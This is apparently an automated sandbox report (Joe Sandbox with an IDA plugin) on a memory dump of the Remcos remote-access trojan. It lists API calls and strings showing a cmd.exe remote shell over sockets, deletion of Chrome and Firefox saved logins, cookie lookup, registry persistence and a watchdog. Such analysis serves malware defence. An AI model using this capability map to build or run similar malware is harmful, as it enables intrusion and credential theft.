                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                        • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                        • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                        • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                        • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                      • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                      • API String ID: 1529173511-1365410817
                                      • Opcode ID: faed5817389e9e1c44c9bd25bc2e5785f6855519673eedd1caaf3ae8bfa0178d
                                      • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                      • Opcode Fuzzy Hash: faed5817389e9e1c44c9bd25bc2e5785f6855519673eedd1caaf3ae8bfa0178d
                                      • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                                      Control-flow Graph

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                      • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                      • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                      • closesocket.WS2_32(?), ref: 00404E3A
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
                                      • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                                      • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                                      • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                                      • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                                      • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
                                      • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                      • String ID:
                                      • API String ID: 2403171778-0
                                      • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                      • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                      • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                      • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 437 445a95-445aa9 438 445ab6-445ad1 LoadLibraryExW 437->438 439 445aab-445ab4 437->439 441 445ad3-445adc GetLastError 438->441 442 445afa-445b00 438->442 440 445b0d-445b0f 439->440 443 445ade-445ae9 LoadLibraryExW 441->443 444 445aeb 441->444 445 445b02-445b03 FreeLibrary 442->445 446 445b09 442->446 447 445aed-445aef 443->447 444->447 445->446 448 445b0b-445b0c 446->448 447->442 449 445af1-445af8 447->449 448->440 449->448
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                      • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                      • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                      • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                      • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 458 4459f9-445a23 459 445a25-445a27 458->459 460 445a8e 458->460 461 445a2d-445a33 459->461 462 445a29-445a2b 459->462 463 445a90-445a94 460->463 464 445a35-445a37 call 445a95 461->464 465 445a4f 461->465 462->463 468 445a3c-445a3f 464->468 466 445a51-445a53 465->466 469 445a55-445a63 GetProcAddress 466->469 470 445a7e-445a8c 466->470 471 445a70-445a76 468->471 472 445a41-445a47 468->472 473 445a65-445a6e call 432123 469->473 474 445a78 469->474 470->460 471->466 472->464 475 445a49 472->475 473->462 474->470 475->465
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc__crt_fast_encode_pointer
                                      • String ID:
                                      • API String ID: 2279764990-0
                                      • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                                      • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
                                      • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                                      • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 478 40163e-401644 479 401646-401648 478->479 480 401649-401654 478->480 481 401656 480->481 482 40165b-401665 480->482 481->482 483 401667-40166d 482->483 484 401688-401689 call 43229f 482->484 483->484 486 40166f-401674 483->486 487 40168e-40168f 484->487 486->481 488 401676-401686 call 43229f 486->488 489 401691-401693 487->489 488->489
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                      • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                      • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                      • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 492 443649-443655 493 443687-443692 call 43ad91 492->493 494 443657-443659 492->494 502 443694-443696 493->502 495 443672-443683 RtlAllocateHeap 494->495 496 44365b-44365c 494->496 498 443685 495->498 499 44365e-443665 call 442a57 495->499 496->495 498->502 499->493 504 443667-443670 call 440480 499->504 504->493 504->495
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                      • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                      • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                      • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                        • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                        • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                        • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                      • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                      • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                      • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                      • API String ID: 3018269243-1736093966
                                      • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                                      • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                      • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                                      • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004056C6
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      • __Init_thread_footer.LIBCMT ref: 00405703
                                      • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                      • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                        • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                      • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                      • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                      • CloseHandle.KERNEL32 ref: 00405A03
                                      • CloseHandle.KERNEL32 ref: 00405A0B
                                      • CloseHandle.KERNEL32 ref: 00405A1D
                                      • CloseHandle.KERNEL32 ref: 00405A25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                      • String ID: SystemDrive$cmd.exe
                                      • API String ID: 2994406822-3633465311
                                      • Opcode ID: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                                      • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                      • Opcode Fuzzy Hash: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                                      • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                      • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                      • FindClose.KERNEL32(00000000), ref: 0040AC53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                      • API String ID: 1164774033-3681987949
                                      • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                      • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                      • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                      • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                      • GetLastError.KERNEL32 ref: 00418771
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                      • String ID:
                                      • API String ID: 3587775597-0
                                      • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                      • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                      • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                      • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                      • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                      • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 1164774033-405221262
                                      • Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                                      • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                      • Opcode Fuzzy Hash: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                                      • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                                        • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                      • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                      • String ID:
                                      • API String ID: 2341273852-0
                                      • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                      • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                      • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                      • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                      APIs
                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                      • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                      • API String ID: 2127411465-314212984
                                      • Opcode ID: 95394845dcc8446550d74d224a9db9872a36ac6ce2722934ea231da13fa01e82
                                      • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                      • Opcode Fuzzy Hash: 95394845dcc8446550d74d224a9db9872a36ac6ce2722934ea231da13fa01e82
                                      • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                      APIs
                                        • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                        • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                                        • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                                      • Sleep.KERNEL32(00000BB8), ref: 0040E243
                                      • ExitProcess.KERNEL32 ref: 0040E2B4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                      • String ID: 3.8.0 Pro$override$pth_unenc$!G
                                      • API String ID: 2281282204-1386060931
                                      • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                                      • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                      • Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                                      • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                      • GetLastError.KERNEL32 ref: 0040A999
                                      Strings
                                      • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                      • UserProfile, xrefs: 0040A95F
                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                      • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 2018770650-1062637481
                                      • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                      • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                      • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                      • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00408393
                                        • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                        • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                        • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                        • Part of subcall function 00404E06: FindCloseChangeNotification.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                      • FindClose.KERNEL32(00000000), ref: 004086F4
                                        • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                        • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                      • String ID:
                                      • API String ID: 2435342581-0
                                      • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                      • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                      • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                      • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                        • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
